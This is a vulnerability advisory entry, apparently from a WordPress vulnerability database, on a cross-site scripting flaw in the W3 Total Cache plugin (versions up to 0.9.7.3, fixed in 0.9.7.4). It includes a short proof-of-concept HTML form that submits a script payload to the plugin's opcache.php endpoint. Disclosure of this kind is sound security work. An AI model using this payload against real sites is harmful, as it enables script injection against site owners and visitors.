W3 Total Cache <= 0.9.7.3 - Cross-Site Scripting (XSS)



Proof of Concept
<!DOCTYPE html>
<html>
<body>
     <form action="http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php" method="POST">
         <input type="text" name="nonce" value="974ca6ad15021a6668e7ae02e1be551c">
         <input type="text" name="command" value="<script>alert(1)</script>">
         <input type="submit" name="">
     </form>
</body>
</html> 

Affects Plugin

fixed in version 0.9.7.4

References

URL https://plugins.trac.wordpress.org/changeset/2081515/w3-total-cache#file24

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Thomas Chauchefoin
Views 6856
Verified Yes
WPVDB ID 9269

Timeline

Publicly Published 2019-05-06 (7 months ago)
Added 2019-05-06 (6 months ago)
Last Updated 2019-11-01 (15 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin